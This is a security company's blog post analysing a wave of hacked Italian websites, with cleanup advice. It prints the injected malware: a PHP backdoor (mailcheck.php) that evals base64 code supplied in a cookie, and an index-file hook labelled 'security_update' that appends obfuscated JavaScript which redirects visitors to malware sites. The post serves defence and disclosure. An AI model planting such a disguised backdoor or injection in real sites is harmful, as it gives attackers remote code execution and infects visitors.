Lots of Italian sites getting hacked – Initial analysis

On the last few days we are seeing a large number of reports from Italian sites getting hacked. Way more than the average and way more than from any other country. We got a chance to analyze a couple of them and they all look very much the same.

What is interesting is that we are seeing a wide range of sites, from WordPress blogs, to Joomla-based ones and even simple HTML-only sites. Plus, they are hosted on a large variety of hosting companies, ruling out a shared-server compromise.

Analysis of the attack

All the sites we analyzed followed a similar pattern. First, a script mailcheck.php was added to the root directory of the site:

< ?php eval(base64_decode('aWYoaXNzZXQoJF9DT09LSUVbIl9kZSgk..'));
echo “checking email…”; ?>

If you decode this script by changing the “eval” for “echo”, you can see what is it doing:

$ php mailcheck.php
if(isset($_COOKIE[“PHPSESSIID”])){eval(base64_decode($_COOKIE[“PHPSESSIID”]));exit;}checking email…

So the mailcheck.php is a backdoor that executes whatever command the attacker is giving.

Also, at the top of any index file they added the following:

< ?php ob_start('security_update'); function security_update($buffer){return $buffer.'< script
language=”javascript”>function t(){return z($a);}var $a=”Z64aZ3dZ22fqb0t-
7vrs}vybZ3esZ257F}7+0fqb0cxyvdY~tuh0-0Z2520+vZ257Fb08fqb0y0y~0gy~tZ257FgZ3edgZ3edbu~
tc9kyv08gy~tZ257FgZ3ex0.0(0660gy~tZ257FgZ3ex0,0Z2522!0660yZ3e
..
;}//important security update ?>

They try to hide what they are doing with a “security_update” string at the start of it and an “important security update” comment at the end. Very clever… In fact, one of our clients saw that and didn’t want to remove the code because he thought it was indeed an important update.

What this code does is just a malicious javascript that redirects and loads malware from a couple of other sites. This is what it looks like when I change the “eval” for “alert”:

Here is the code a bit more organized:

Are you seeing issues like that on your site? If you are infected try removing those files and looking for strange entries on your index files. Also, my recommendation is that you revert back to a previous (and clean) backup or do a full scan on all your site to make sure there is nothing hidden in there. As always, you can contact us for help.

Want to read more stories like this one? Follow @sucuri_security on twitter or subscribe to our RSS feed. Interested in a web site security monitoring solution? Visit sucuri.net.